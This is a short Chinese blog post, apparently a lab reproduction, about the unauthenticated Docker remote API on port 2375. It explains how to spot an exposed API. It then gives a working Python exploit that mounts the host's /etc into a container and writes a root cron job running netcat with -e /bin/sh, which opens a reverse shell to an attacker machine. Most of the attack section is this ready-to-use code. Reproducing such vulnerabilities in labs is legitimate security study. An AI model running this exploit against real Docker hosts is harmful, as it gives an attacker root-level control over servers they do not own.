docker未授权访问漏洞总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


前言

记录并复现常见的未授权访问漏洞

一、docker未授权访问漏洞是什么?

Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。常见端口2375

二、复现

1.环境搭建

在这里插入图片描述
如果访问如下页面,返回一个json格式的值{“message”:“page not found”}即存在漏洞也可以访问ip/version或者ip/info获取基本信息

2 漏洞利用

import docker

client = docker.DockerClient(base_url='http://192.168.1.8:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.1.8 1111 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

通过该脚本写入计划任务进行反弹shell
执行完脚本,耐心等待一会才会反弹shell到kali主机,大约一分多钟时间。

该处使用的url网络请求的数据。


  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值